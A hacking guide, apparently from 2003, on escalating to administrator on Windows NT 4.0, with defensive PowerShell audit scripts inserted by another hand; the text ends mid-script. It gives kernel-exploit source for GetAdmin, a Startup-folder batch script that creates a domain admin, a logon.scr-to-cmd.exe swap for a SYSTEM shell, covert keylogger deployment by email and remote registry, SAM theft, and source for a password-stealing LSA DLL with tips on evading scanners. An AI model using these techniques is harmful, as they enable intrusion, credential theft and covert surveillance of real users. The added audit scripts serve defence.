Assorted methods of hacking ..
Some of you may find it hard to read because it is in English, but the content is worth reading.

Quite a lot of it also appears in books. It should be a very useful read for system administrators.





PURPOSE



This guide is written for the average hacker, cracker and system administrator. I wrote this guide so administrators (and hackers) have a good understanding of the security on a Windows NT box. This guide was not written for good nor evil; it was written purely for people to develop their knowledge further on a Windows NT box. So, as I said, if you abuse this knowledge and end up going to court, don't bring my name into it: I told you how to do it, but I never said do it...



If you are more interested in actually hacking into an NT box remotely, then you will have to wait until the guide entitled "The Ultimate Hackers Handbook to Hacking Windows NT" comes out. I hope you learn something from reading this text file even if you are a Linux/Unix fan. I know there are probably spelling mistakes and bad use of grammar in this guide, but I don't really care; providing it's readable, who really does care?



NOTE: THE BOX YOU ARE PENETRATING IS A WINDOWS NT WORKSTATION 4.0, BUT THIS REALLY DOESN'T MATTER; IT ALL DEPENDS ON HOW UP TO DATE THE PATCHES ARE (YOU WILL SEE WHAT I MEAN WHEN YOU READ ON)





Starting Point



So what would make an excellent penetration attempt? Getting your hands on a copy of the SAM (Security Account Manager) database and then running the latest version of L0phtCrack against it. So firstly you would look in WINNT\REPAIR and, if there is a copy of the SAM there (it is stored compressed as SAM._ and has to be unpacked with expand.exe before it can be loaded), copy it to a formatted floppy disk and leg it out of the building. Then, when you get home, load it into your home version of L0phtCrack, feed in a bunch of wordlists and dictionary files, turn on the TV, watch an episode of Buffy The Vampire Slayer, and once that is finished check L0phtCrack: you would have uncovered about 60 odd passwords, including the Admin's! Hurray, mission accomplished. Easy, hey?



But what if a copy of the SAM isn't there? Well, it looks like you're going to have to get Admin privileges, and this is what the guide is here for...





EXPLOIT 1 - GETADMIN.EXE



Ok, now before I explain to you what "GetAdmin" actually is, I think I had better just tell you that this exploit was written in 1997. At the time of writing this the year is 2003, so if this exploit actually works on your system you should really look for updates, because you badly need a service pack. Anyway, on with the exploit.



A very clever person called Konstantin Sobolev wrote the program, so all credit goes to him. Since this is his program, it's best that he explains how it works...



"This program can get administrator rights without any special privileges. Simply run GetAdmin or GetAdmin account_name from the command line. If you do not enter account_name, the current account will be used.



The bug is in the subfunction of NtAddAtom, which does not check an output address. So it's possible to write into kernel memory. Of course it's not necessary to inject a DLL into winlogon to get admin rights. You can simply replace some part of ntoskrnl or replace the process token, etc.





Preventing the Attack



Only one real way: patch ntoskrnl and replace the function NtAddAtom so it checks for a valid address.



You can remove all access from ntoskrnl, but it's possible to take into account the fixed address of NtGlobalFlag in the GetAdmin program. So other ways to get administrator rights exist if you can write to the kernel memory."



Now, if you didn't really take any of that in, here is a STEP-BY-STEP guide to executing the program... NOTE: IT DOESN'T WORK ON ALL VERSIONS OF NT!



STEP 1



The file is in Zip format, so unzip it with an unzipping utility such as WinZip...



STEP 2



Extract the files to any directory to which you have read and write access.



STEP 3



Locate the directory to where you unzipped the files and check that you have the following files...



GetAdmin.exe - The file you will be executing



GASYS.DLL - The DLL that GetAdmin.exe injects into the winlogon process (see "How it works?" below)



STEP 4



Load up Cmd.exe (the DOS B0x)



STEP 5



Change to the directory where the two files are located



STEP 6



Execute GetAdmin.exe by typing GetAdmin.exe Account_Name



E.g. if I was logged in as Michelle Trachtenberg I would type...



GetAdmin.exe "Michelle Trachtenberg"   (quote the name if it contains a space; otherwise cmd.exe passes only "Michelle" as the account name)



You should then get a message which says something like "Congratulations, Michelle Trachtenberg has Admin rights!" If this happens, log out, then log in again as Michelle Trachtenberg (or whatever account you were in); the new group membership only shows up in a fresh logon token. If this doesn't happen, go to step 7.



STEP 7



Wait....



The screen will freeze for a while and perhaps may even crash! So reboot the machine and log in as Michelle Trachtenberg (or whatever your account name is).



STEP 8



Bingo! You should have Admin rights! You can do anything you want! I advise you to download L0phtCrack and some wordlists and launch them against the machine. Then hide the application and get on with some work!



An hour later you should have recovered about 30 - 50 passwords (it all depends on how strong the passwords are and where you downloaded the dictionary files from).



Now, for all you really clever people and top notch programmers, here is some of the source code to the program GetAdmin.exe....





How it works?



Here is the main line that does it all in GetAdmin:



ChangeNtGlobalFlag(GetNtGlobalFlagPtr()); After that you can open any process in the system, because the function NtOpenProcess does not check for SE_DEBUG_PRIVILEGE when the bit in NtGlobalFlag+2 is set. Furthermore, the program injects a DLL into the winlogon process. Winlogon is running under the SYSTEM account, so it can add / remove users in the Administrators group.





Function ChangeNtGlobalFlag (the parameter is the kernel address of NtGlobalFlag, as returned by GetNtGlobalFlagPtr()):

/* Excerpt from GetAdmin (Konstantin Sobolev, 1997); unpatched NT 4.0 x86 only.
 * It builds a fake argument frame for the NtAddAtom system call whose
 * output-handle pointer is pNtGlobalFlag+1, i.e. kernel memory. Because
 * NtAddAtom never validates that pointer, the atom handle it returns is
 * written straight into NtGlobalFlag. */
#include <windows.h>
#include <stdio.h>

BOOL ChangeNtGlobalFlag(DWORD pNtGlobalFlag)
{
    DWORD callnumber = 0x3;    /* NtAddAtom's system service number on NT 4.0 */
    DWORD stack[32];           /* fake argument frame the kernel reads via EDX */
    int   i;
    DWORD handle = 0;
    CHAR  string[255];

    if (!pNtGlobalFlag) return FALSE;

    stack[0] = (DWORD)string;  /* arg 1: atom name */
    stack[1] = (DWORD)&handle; /* arg 2: where the kernel writes the new atom handle */

    for (i = 0; i < 0x100; i++) {
        /* a fresh atom name each pass, so each call returns a new handle value */
        sprintf(string, "NT now cracking... pass %d", i);

        /* once a handle with bits set in 0xf00 has come back, point the unchecked
         * output address at NtGlobalFlag+1 so the next handle is written there */
        if (handle & 0xf00) {
            stack[1] = (DWORD)pNtGlobalFlag + 1;
        }

        __asm {
            mov eax, callnumber        ; service number for the int 2e dispatcher
            mov edx, stack             ; as in the original; overwritten by the lea below
            lea edx, dword ptr [stack] ; EDX -> argument frame
            int 0x2e                   ; NT 4.0 system-call gate
        }

        if (stack[1] == pNtGlobalFlag + 1) break;   /* the redirected write has been issued */
    }
    return TRUE;
}



That's actually pretty complex, but if you understand all the source code, fair play! By now you should all have a rough understanding of how to execute GetAdmin.exe, and a good understanding of how it works.



If you are an Admin and this exploit worked, then go to www.microsoft.com and look for GetAdminFix.exe (the post-Service Pack 3 hotfix), or go to a search engine and type in "Download patch for GetAdmin.exe".



If the exploit didn't work, you either...



Already have the patch for it (well done), or

Are running a version of Windows that the GetAdmin exploit isn't compatible with.



Ok, on with the next exploit...







--------------------------------------------------------------------------------





HACKERS TIP: IF THE EXPLOIT DIDN'T WORK, TRY DOWNLOADING A PROGRAM CALLED CRASH.EXE. RUN THIS PROGRAM FIRST, THEN RUN GETADMIN, AND YOU SHOULD THEN BE ADDED TO THE ADMIN GROUP....







--------------------------------------------------------------------------------







EXPLOIT 2 - SECHOLE.EXE



Ok, again this one is fairly old, but it came out after getadmin.exe, so if getadmin.exe didn't work for you this one should. Sechole.exe is basically another admin attack, and this is how it works; the following was taken from the readme file in sechole.zip...



Another GetAdmin attack -- lets any user become an admin user instantly!!



Attached are the README file, the executable and the DLL which demonstrate the NT security hole.



Steps to follow: You need to have a machine running Windows NT 4.0 or 5.0 beta; either workstation or server will do.





Login as any non-admin user on the machine (even the guest account will do). (You may verify that the logged in user does not possess admin privilege at this time by trying to run the "windisk" program from the shell. This should fail since the user does not have admin privilege.)

Copy the attached files SECHOLE.EXE and ADMINDLL.DLL onto your hard disk in any directory, while logged in as the above non-admin user.

Run SECHOLE.EXE. After this your system might become unstable or even hang. The damage is already done by this time. Simply reboot the machine. You will see that the non-admin user now belongs to the Administrators group. This means that the user has complete admin control over that machine. Now you will be able to run programs like "windisk". Another way to verify newly acquired admin privileges is to run the "User Manager" from the "Administrative Tools".



In my opinion this bug is very difficult to fix. I plan to write about it in our upcoming book "Undocumented Windows NT", which is yet to be published and talks about a host of undocumented calls that Microsoft uses. Something every serious programmer must have.



Right, there is nothing else really to say about that exploit; it's quite simple to understand and execute, so I'll let you work the rest out.







--------------------------------------------------------------------------------







EXPLOIT 3 - BATCH HACKING



One day I was just messing about with the BATCH language and I found an exploit that could actually help you get Admin access. Now, when you see this exploit you may think "That's pretty old and was discovered ages ago", BUT I wrote this in the space of 10 minutes and it worked like a charm. First I will give you the actual source code for the BATCH script, then I will write out simple steps on how to use it.... To pull off this hack simply log in as guest.










--------------------------------------------------------------------------------



@echo off
rem Replace %user% with the account name you want created (or set user=<name> first).
rem Whatever sits in the all-users Startup folder runs with the rights of whoever
rem logs on next; that is why the script works once an administrator logs in.
net user %user% pass /active:yes /add /domain
net localgroup Administrators %user% /add
net group "Domain Admins" %user% /add /domain
rem "Guests" is a local group; the global group on the domain is "Domain Guests".
net group "Domain Guests" %user% /delete /domain





--------------------------------------------------------------------------------







STEP-BY-STEP GUIDE TO USING THE "HACKING BATCH SCRIPT"



STEP 1



Open up notepad



STEP 2



Copy and paste the above script into the notepad



STEP 3



Then "Save As" and save it as XXXXX.BAT (XXXXX being whatever name you want to call it), into the following directory....



WINNT\Profiles\All Users\Start Menu\Programs\Startup



Bingo! At the next administrator login the script runs with the administrator's rights, and the user gains privileged access to the system and the domain.



NOTE: IF YOUR ADMIN IS A PRO THEN HE/SHE WILL HAVE DISABLED CERTAIN NET COMMANDS AND MAY EVEN HAVE BLOCKED WRITE ACCESS TO THE STARTUP FOLDER! BUT THIS SCRIPT IS WORTH A SHOT :)







--------------------------------------------------------------------------------







EXPLOIT 4 - REPLACING LOGON



I was browsing the underground and I came across a simple text file written by, well, I didn't get his name, he didn't leave it, but if he is reading this now, email me and I can give you the proper credit you deserve, ok? The text file I discovered gives a rather simple way of getting ADMIN privileges; here is how you do it.



If you can log in as an account, drop to DOS (Start -> Run -> cmd) and at the C: prompt type the following (assuming default install locations):





C:\> cd \winnt\system32

C:\winnt\system32> copy logon.scr logon.scr.old

C:\winnt\system32> del logon.scr

C:\winnt\system32> copy cmd.exe logon.scr





Now log off the machine. logon.scr is the screen saver that kicks in after 15 minutes of not touching the keyboard/mouse at the logon screen. Wait 15-20 minutes and a DOS prompt with FULL SYSTEM rights will pop up; then just type C:\> net user administrator <newpassword> (net user takes the account name followed by the new password) and log in as Administrator with the new password.



Try this, it might work, and as long as he/she didn't change the default permissions on C:\winnt and C:\winnt\system32 you should be golden.



Heh, there you have it, another very easy way to get Admin! BUT remember, once you have changed the password on the administrator's account, make sure you sort out the screen saver mess and change it back to how it was (put logon.scr.old back as logon.scr), or otherwise it's going to happen to you! Yeah, I know, it's a vicious circle!







--------------------------------------------------------------------------------





HACKERS TIP: IF YOU DON'T WANT TO RISK LOGGING IN AS ADMIN AND CHANGING THE PASSWORD, WELL, SINCE YOU HAVE A DOS BOX WITH FULL SYSTEM RIGHTS, SIMPLY RUN THE "RDISK" COMMAND AND CREATE AN EMERGENCY REPAIR DISK ON A:\. THE EMERGENCY DISK WILL CONTAIN ALL THE IMPORTANT FILES WINDOWS NT NEEDS TO LOAD, INCLUDING THE SAM! BUT THERE IS A CATCH: THE SAM WILL ONLY HAVE ADMIN AND GUEST! SOMETIMES IT ONLY HAS GUEST, SO BE CAREFUL :(







--------------------------------------------------------------------------------







EXPLOIT 5 - KEY LOGGING



I was actually wondering if I should include this hacker technique and NT exploit because it is a tad lame! And I don't really know if it fits in as getting Admin, but anyway I suppose I had better explain how this one works... You all know what a key logger is, right? Well, it's a piece of software which gets stored on the victim's computer and logs all keystrokes to a "hidden" file; sometimes it's password protected so only the person who installed the key logger can view/add/edit/uninstall it. There are two main types of key logger: hardware key loggers and software key loggers.



HARDWARE KEYLOGGERS - A hardware key logger is a piece of equipment which gets plugged into the back of the PC and then gets linked up with another PC, and whatever gets typed on the first PC shows up on the other PC; it's kind of obvious when you think about it. Here is another example of a hardware key logger: imagine a normal keyboard, the usual type, the one which you plug into the back of your PC. Well, there are "special" keyboards which look identical to a normal keyboard, only they log ALL keys that are pressed and store them in a file which the attacker or concerned parents specify. Some hardware key loggers come with software and others don't. Well, this file isn't about key loggers, so just look around yourself, and be careful, you could be being logged right now... :)



SOFTWARE KEYLOGGERS - Yeah, you guessed it, a software key logger is a program which, as I said above, gets installed secretly on the PC; all keys are then logged to a hidden file, and the file is password protected, so if you discover it and try to delete it you will be prompted with a password box. To be honest it is actually quite scary, because key loggers are now pretty advanced and contain advanced features such as...





LOG all Yahoo! MSN, AIM conversations.

LOG all screenshots

LOG all websites visited

LOG all applications run

LOG all passwords.



And what is even scarier is that some key loggers contain "remote logging", which means that an attacker can bind the key logger with another exe file and send it via email; all keys are then sent to the attacker's PC over email.



Well, I went to www.google.com and was looking very quickly at Windows NT loggers, and let me tell you there are loads! So browse around and see what you can find; however, I do recommend looking for one called "Blazing Tools Perfect Keylogger", since it has a lot of advanced features and can be installed remotely, which means that you can combine the key logger with an exe file (as I have mentioned above) and when the victim runs the exe file the key logger is stealthily installed on their PC (you send it via email). Then all the key log information goes to your email account in the form of *.log files. This is pretty cool; you can also set the key logger to start at boot, therefore you can catch network passwords including the Admin's!!! (One caveat: a user-mode logger only sees keystrokes on the desktop it is hooking, so it catches passwords typed into applications and "net use" prompts, not the ones typed into the Ctrl+Alt+Del logon box, which lives on Winlogon's separate desktop.)



Anyway, as I said, it is a bit lame and it's not guaranteed to work 100%, but I'm sure if you send one to Admin@company.com you could come across quite a lot of interesting things such as MSN passwords, Yahoo account information etc. BUT this is script kiddie behaviour! BUT then again it could get the job done pretty quickly...



Anyway, to finish this section I'll tell you about the features of "Blazing Tools Perfect Keylogger"...





Can be absolutely invisible

Visual surveillance (screenshots)

Logging texts typed in every application

Websites logging

Clipboard logging

Sending log and screenshots by e-mail in the hidden mode

Stealth uploading logs by FTP

Remote installation

Log file is encrypted and can be protected with a password

Monitoring all users of the PC, even if you don't know their passwords

Easy log viewing and management

Export log to HTML format

Possibility to specify target applications

Supports all Windows versions, including Windows XP

Very easy to use

Low price



If you manage to get Admin, you may want to take the key logger one step further by stealing everyone else's password; you can do this in the following steps...





Install and configure the key logger on the administrator's PC

Copy the key logger's folder contents (by default Program Files\BPK) to any folder on the remote computer.

Click Start > Run and type regedt32

Choose the Registry > Select Computer command (that is what NT 4's regedt32 calls it; the command is worded differently in other versions of Windows)

Connect to the PC you have chosen and open the HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run registry branch

Add a REG_SZ value with any name whose data is the full path to bpk.exe (the key logger's executable)

On the next Windows start-up the key logger will start its work

Ok, for all you network security experts and 1337 (elites) shouting at the screen now "LAME exploit! Can easily be avoided", let's just ignore the key logger and move on...
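An added example, not from the original guide or any tool it names: a PowerShell audit of the three places Exploits 3, 4 and 5 plant themselves, namely the all-users Startup folder, the logon screen saver in System32, and the HKLM Run keys, the last read over the remote registry the same way the regedt32 steps above do it by hand. It assumes Windows PowerShell 5.1 or later, an account allowed to read those locations, and, for a remote target, that the Remote Registry service on it accepts the connection; the function names and the $ComputerName parameter are mine.

```powershell
# Added audit script; not part of the original guide. Assumes PowerShell 5.1+.

function Get-StartupFolderEntry {
    # Exploit 3: anything here runs in the context of whoever logs on next,
    # so list it with hashes an admin can compare against a known-good baseline.
    $startup = [Environment]::GetFolderPath('CommonStartup')   # NT 4: %SystemRoot%\Profiles\All Users\Start Menu\Programs\Startup
    Get-ChildItem -LiteralPath $startup -Force -File -ErrorAction SilentlyContinue | ForEach-Object {
        [pscustomobject]@{
            Location = 'All Users Startup'
            Name     = $_.Name
            Modified = $_.LastWriteTime
            Sha256   = (Get-FileHash -LiteralPath $_.FullName -Algorithm SHA256).Hash
        }
    }
}

function Test-LogonScreenSaver {
    # Exploit 4: logon.scr runs as SYSTEM on the logon desktop. A copy of
    # cmd.exe renamed to logon.scr still carries a valid Microsoft signature,
    # so the version resource (OriginalFilename / FileDescription) is what
    # gives the swap away, not the signature on its own.
    $scr = Join-Path $env:SystemRoot 'System32\logon.scr'
    if (-not (Test-Path -LiteralPath $scr)) {
        return [pscustomobject]@{ Path = $scr; Present = $false; Suspicious = $false }
    }
    $info = (Get-Item -LiteralPath $scr).VersionInfo
    [pscustomobject]@{
        Path             = $scr
        Present          = $true
        Signature        = (Get-AuthenticodeSignature -FilePath $scr).Status
        OriginalFilename = $info.OriginalFilename
        Description      = $info.FileDescription
        Sha256           = (Get-FileHash -LiteralPath $scr -Algorithm SHA256).Hash
        Suspicious       = ($info.OriginalFilename -notmatch '\.scr$')
    }
}

function Get-RunKeyEntry {
    # Exploit 5: the Run/RunOnce values, read locally or from another machine's
    # registry (what the guide does by hand with regedt32 > Select Computer).
    param([string]$ComputerName = $env:COMPUTERNAME)
    $remote = ($ComputerName -ne $env:COMPUTERNAME)
    $hklm = if ($remote) {
        [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey([Microsoft.Win32.RegistryHive]::LocalMachine, $ComputerName)
    } else {
        [Microsoft.Win32.Registry]::LocalMachine
    }
    try {
        foreach ($sub in 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
                         'SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce') {
            $key = $hklm.OpenSubKey($sub)
            if (-not $key) { continue }
            foreach ($name in $key.GetValueNames()) {
                [pscustomobject]@{
                    Computer = $ComputerName
                    Key      = "HKLM\$sub"
                    Name     = $name
                    Command  = $key.GetValue($name)
                }
            }
            $key.Close()
        }
    }
    finally { if ($remote) { $hklm.Close() } }
}

# Usage: run elevated so every location is readable; pass -ComputerName to
# Get-RunKeyEntry to inspect another machine over the remote registry.
Get-StartupFolderEntry | Format-Table -AutoSize
Test-LogonScreenSaver   | Format-List
Get-RunKeyEntry         | Format-Table -AutoSize
```

The Startup and Run listings are only useful against a baseline taken when the box was known clean; the screen saver check stands on its own, because the version resource of a renamed cmd.exe names it as the Windows command processor.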







--------------------------------------------------------------------------------







EXPLOIT 6 - RDISK



Ok, I'm going to be honest: this worked once for me and that's it! So don't be surprised if this doesn't work at all.



Anyway, we all know the DOS command "RDISK". Basically, if you read the hacker's tip above you'll realise that when you run this command it produces an emergency repair disk. Now let me explain: on this disk all the important main start-up files are copied, including the SAM. However, the only accounts on there will be Guest and Administrator (possibly).... The reason is that plain rdisk refreshes the repair information in %SystemRoot%\repair but leaves its SAM._ and SECURITY._ copies alone; those date from installation unless an administrator has since run "rdisk /s", the switch that re-saves the live SAM and SECURITY hives. So the Administrator hash you get is the one that was current when that copy was last made, not necessarily today's. So follow these steps... to pull off this hack...........



STEP 1



Log in as anyone who has access to cmd.exe



STEP 2



Run the DOS B0x and then type the command "RDISK" (make sure you are in the Winnt directory).



STEP 3



Pop in a floppy disk when it tells you (you will get a warning that the floppy disk will be formatted; simply click OK)



STEP 4



Sit back and relax and let it copy all the main files to the disk.



STEP 5



Nick the disk! And when you get home import the SAM file from the disk (remember it is the compressed SAM._ and needs expanding first) and run L0phtCrack against it... AND HOPEFULLY THE ADMIN ACCOUNT WILL BE ON THERE, BUT NO PROMISES!



NOTE TO ADMINS: YOU CAN AVOID THIS BY RESTRICTING WHO CAN RUN RDISK AND, MORE IMPORTANTLY, BY TIGHTENING THE ACL ON %SYSTEMROOT%\REPAIR SO THAT ONLY ADMINISTRATORS CAN READ IT (ANYONE WHO CAN READ THAT DIRECTORY DOESN'T NEED RDISK OR A FLOPPY AT ALL)







--------------------------------------------------------------------------------







EXPLOIT 7 - MY FRIEND PETER



THIS EXPLOIT WAS TAKEN FROM "The Unofficial NT Hack FAQ"



And this is pretty advanced, so if you are new to Windows NT security/hacking I would give this exploit a miss and come back to it later...



Use the Offline NT Password Editor by Petter Nordahl-Hagen. You need to download Petter's code to your Linux machine (you DO have one of those, don't you?) and compile it using a libDES and MD4 library. Now mount the NT drive read/write and follow the instructions in the readme. The instructions are pretty easy to follow, especially if you know enough to get to the point to use them ;-)



Actually, to make things easier, Petter has built a bootdisk image that steps you through the entire thing. I'll be the first to admit that Petter's code is as dangerous as hell, but it does work and I had no problems. YMMV.



Consider using GetAdmin.exe (section 04-5) and go from there if you are too paranoid or fearful of booting up Linux to get to an NT machine.







--------------------------------------------------------------------------------







EXPLOIT 8 - %SYSTEMROOT%\SYSTEM32 BEING WRITABLE



Again, this exploit was taken from "The Unofficial NT Hack FAQ" by Simple Nomad, and I found this exploit quite successful when trying to steal network passwords. The only downside is that good AV (anti-virus) will pick this exploit up quite quickly if you don't compile it very well, but nevertheless you might as well have a shot...



Well, this can be exploited on NT 4.0 by placing a trojaned FPNWCLNT.DLL in that directory. This file typically exists in a Netware environment. First compile this exploit code written by Jeremy Allison (jra@cygnus.com) and call the resulting file FPNWCLNT.DLL. Now wait for the user names and passwords to get written to a file in \temp.



------------- Cut --------------





/* Password-capturing notification package (Jeremy Allison, via the NT Hack FAQ).
 * LSA loads every DLL named in HKLM\SYSTEM\CurrentControlSet\Control\Lsa\
 * Notification Packages at boot and calls its PasswordChangeNotify export, as
 * SYSTEM, with the new cleartext password; FPNWCLNT is in that list on NT 4.0,
 * so a DLL of that name dropped into System32 sees every password change.
 * Build as a DLL and export InitializeChangeNotify and PasswordChangeNotify by
 * their undecorated names (a .def file), since LSA looks them up by name. */
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

struct UNI_STRING {          /* same layout as the native UNICODE_STRING */
    USHORT len;              /* length in bytes, not characters */
    USHORT maxlen;
    WCHAR *buff;             /* not NUL-terminated */
};

static HANDLE fh;

/* Called once by LSA when the package is loaded. */
BOOLEAN __stdcall InitializeChangeNotify(void)
{
    DWORD wrote;
    fh = CreateFile("C:\\temp\\pwdchange.out", GENERIC_WRITE,
                    FILE_SHARE_READ | FILE_SHARE_WRITE, 0, CREATE_ALWAYS,
                    FILE_ATTRIBUTE_NORMAL | FILE_FLAG_WRITE_THROUGH,
                    0);
    WriteFile(fh, "InitializeChangeNotify started\n", 31, &wrote, 0);
    return TRUE;
}

/* Called by LSA after every successful password change. */
LONG __stdcall PasswordChangeNotify(struct UNI_STRING *user, ULONG rid,
                                    struct UNI_STRING *passwd)
{
    DWORD wrote;
    WCHAR wbuf[200];
    char buf[512];
    char buf1[200];
    DWORD len;

    /* user name: copy the counted string, NUL-terminate it, narrow to ANSI */
    memcpy(wbuf, user->buff, user->len);
    len = user->len / sizeof(WCHAR);
    wbuf[len] = 0;
    wcstombs(buf1, wbuf, 199);
    sprintf(buf, "User = %s : ", buf1);
    WriteFile(fh, buf, strlen(buf), &wrote, 0);

    /* the new password, in cleartext */
    memcpy(wbuf, passwd->buff, passwd->len);
    len = passwd->len / sizeof(WCHAR);
    wbuf[len] = 0;
    wcstombs(buf1, wbuf, 199);
    sprintf(buf, "Password = %s : ", buf1);
    WriteFile(fh, buf, strlen(buf), &wrote, 0);

    sprintf(buf, "RID = %x\n", rid);
    WriteFile(fh, buf, strlen(buf), &wrote, 0);

    return 0L;
}





------------- cut --------------



If you load this on a Primary Domain Controller, you'll get EVERYBODY'S password. You have to reboot the server after placing the trojan in %systemroot%\system32.



ISS (www.iss.net) has a security scanner for NT which will detect the trojan DLL, so you may wish to consider adding extra junk to the above code to make the size of the compiled DLL match what the original was. This will prevent the current shipping version of ISS's NT scanner from picking up the trojan.



It should be noted that by default the group Everyone has default permissions of "Change" in %systemroot%\system32, so any DLL that is not in use by the system could be replaced with a trojan DLL that does something else.
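An added check, not from the FAQ or the guide, for the mechanism this trojan relies on. LSA loads the DLLs named in the Notification Packages value under HKLM\SYSTEM\CurrentControlSet\Control\Lsa and calls their PasswordChangeNotify export with every new cleartext password; FPNWCLNT is listed there on NT 4.0, and a DLL of that name in System32 is what gets loaded. The PowerShell below lists each package with whether its file is present, signed and who built it, and looks for the C:\temp\pwdchange.out drop file this particular DLL writes. It assumes Windows PowerShell 5.1 or later and read access to the Lsa key and System32; the function names are mine.

```powershell
# Added example; not code from the original guide or the NT Hack FAQ.

function Get-LsaNotificationPackage {
    # Each name here is a DLL that LSA will load from System32 and hand every
    # password change to. Anything unsigned, from an unknown vendor, or listed
    # but absent (so a dropped file would be picked up at next boot) deserves a look.
    $lsa   = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
    $names = (Get-ItemProperty -Path $lsa -Name 'Notification Packages' -ErrorAction SilentlyContinue).'Notification Packages'
    foreach ($name in @($names)) {
        if ([string]::IsNullOrWhiteSpace($name)) { continue }
        $file = if ($name -match '\.dll$') { $name } else { "$name.dll" }
        $path = Join-Path (Join-Path $env:SystemRoot 'System32') $file
        $row  = [ordered]@{ Package = $name; Path = $path; Present = (Test-Path -LiteralPath $path) }
        if ($row.Present) {
            $item          = Get-Item -LiteralPath $path
            $row.Signature = (Get-AuthenticodeSignature -FilePath $path).Status
            $row.Company   = $item.VersionInfo.CompanyName     # blank on a home-compiled DLL
            $row.Size      = $item.Length
            $row.Modified  = $item.LastWriteTime
            $row.Sha256    = (Get-FileHash -LiteralPath $path -Algorithm SHA256).Hash
        }
        [pscustomobject]$row
    }
}

function Test-PwdChangeDropFile {
    # The FAQ's DLL writes C:\temp\pwdchange.out and starts it with a fixed
    # banner line; its presence is the cheapest indicator that this exact
    # trojan has been loaded by LSA.
    param([string]$Path = 'C:\temp\pwdchange.out')
    if (-not (Test-Path -LiteralPath $Path)) { return $null }
    $head = Get-Content -LiteralPath $Path -TotalCount 1
    [pscustomobject]@{
        Path      = $Path
        FirstLine = $head
        IsTrojan  = ($head -eq 'InitializeChangeNotify started')
        Lines     = (Get-Content -LiteralPath $Path | Measure-Object).Count
    }
}

# Usage (elevated): the package list first, then the drop file.
Get-LsaNotificationPackage | Format-Table -AutoSize
Test-PwdChangeDropFile     | Format-List
```

Because a trojan author can pad the DLL to the original's size (as the FAQ suggests) and can pick any output path, the hash, signature and company fields are the durable signals; the drop-file check only catches this specific build.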







--------------------------------------------------------------------------------







EXPLOIT 9 - ACCESS CONTROL LIST AB(USE) BY ME!



On every Windows NT box each file and directory carries an ACL (Access Control List). Each user and group has a SID (Security Identifier), and when a user attempts to read or write a file the access is checked against the list of access-control entries inside the ACL. So the Guest account, for example, isn't allowed to do as many things as the Administrator (obviously) because of the ACL. Here is a list of the flags controlling ACL for files and directories....





FLAG   DESCRIPTION
-----  -----------------------------------
N      No access
R      Read
W      Write
X      Execute
D      Delete
P      Change permissions
O      Take ownership
All    Full control (all of the above)
RX     Directory: list / scan files
WX     Directory: add files





So how does this bit of knowledge help you get Admin? Well, think about it: you are limited to a certain number of things because of the ACLs and your SID, so if you could edit the access-control entries (or the owner, who can always rewrite them) your access would change. Confused? Well, don't worry, because I will take you through the steps of the methods that have worked for me (note: I am writing this from personal experience, so don't blame me if whatever I say turns out totally different!)



To pull off this hack I suggest you get the following tool(s) (if you don't have access to them already). These are the tools I used to "unset my flags" and to modify the access control entries inside the ACL.



GRANT



REVOKE



SETOWNER - This is the tool I use the most because it gets the job done nicely :)



Once you have downloaded these tools, note the directory where you have saved them. Now open up a DOS B0x and change to the directory where they are located. I suggest you first run SETOWNER.EXE (if you can work this one you can mainly work all of them). Ok, now once this is done you'll get something like........



Setowner 1.1 something, something, copyright Arne Vidstrom. So straight away you can see that there aren't that many options, so this program is quite simple to use; just remember one key thing.......



Setowner PATH [Domain\Account]



So let's do some examples. Say for instance we wanted to find out who owned the file Diary.txt; we would simply type.........



Setowner PATH-OF-FILE, e.g. Setowner C:\Files\Diary.txt



and then you would get something like.........



The File owner is: OWNER OF FILE E.G



The File owner is: Michelle Trachtenberg



Pretty simple, huh? Basically all we have done is selected a file and found out who owns it. Now let's move on to more actual hacking (well, sort of).



Say for instance that one of the "employees" (including the Administrator) has a file that you want and you know the full path; a simple command with Setowner can easily make you 0wn the file. The command is this...



Setowner FULL-PATH OWNER, e.g.



Setowner C:\Files\Diary.txt Michelle Trachtenberg



What would happen is that Michelle Trachtenberg would become the 0wner of "C:\Files\Diary.txt", understand? It's really simple; the Setowner program even includes examples, so you should have no trouble using it. One catch, though: NT only lets you take ownership if the file's ACL grants you Take Ownership (the O flag above) or your account holds the Take Ownership privilege (SeTakeOwnershipPrivilege), which only Administrators have by default. Against a properly permissioned file Setowner just fails with access denied; it shines where the admin left the O or P flag open to Everyone.
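An added example, not the guide's and not part of Setowner, that checks the two things the Setowner trick actually depends on: whether the current token holds SeTakeOwnershipPrivilege (or the backup/restore privileges, which also bypass the DACL), and which objects under a path grant Take Ownership, Change Permissions or write access to Everyone, Users or Authenticated Users. Run against the guide's own interesting locations, %SystemRoot%\repair (the SAM._ copy from the Starting Point and Exploit 6), System32 (the Exploit 4 and Exploit 8 file swaps) and the all-users Startup folder (Exploit 3), it shows which of those tricks a given box is open to. Assumes Windows PowerShell 5.1 or later; the function names and the example paths are mine.

```powershell
# Added ACL audit; not code from the original guide. Assumes PowerShell 5.1+.

function Get-TokenPrivilege {
    # Parse `whoami /priv` so the script can tell whether taking ownership of an
    # arbitrary file is even possible for the account running it.
    whoami /priv /fo csv | ConvertFrom-Csv | ForEach-Object {
        [pscustomobject]@{ Name = $_.'Privilege Name'; State = $_.State }
    }
}

function Find-WeakDacl {
    # Report objects whose DACL lets a non-privileged principal rewrite the
    # object, its permissions (the P flag) or its owner (the O flag).
    param(
        [string[]]$Path,
        [int]$Depth = 1
    )
    # \bWrite\b keeps WriteAttributes / WriteExtendedAttributes (harmless, and
    # granted to Users almost everywhere) out of the results.
    $weak = 'TakeOwnership|ChangePermissions|\bWrite\b|CreateFiles|AppendData|Modify|FullControl|\bDelete\b'
    $who  = '^(Everyone|BUILTIN\\Users|NT AUTHORITY\\Authenticated Users|NT AUTHORITY\\INTERACTIVE|.*\\Domain Users)$'
    foreach ($root in $Path) {
        if (-not (Test-Path -LiteralPath $root)) { continue }
        $items = @(Get-Item -LiteralPath $root) +
                 @(Get-ChildItem -LiteralPath $root -Recurse -Depth $Depth -Force -ErrorAction SilentlyContinue)
        foreach ($item in $items) {
            $acl = Get-Acl -LiteralPath $item.FullName -ErrorAction SilentlyContinue
            if (-not $acl) { continue }
            $hits = @($acl.Access | Where-Object {
                $_.AccessControlType -eq 'Allow' -and
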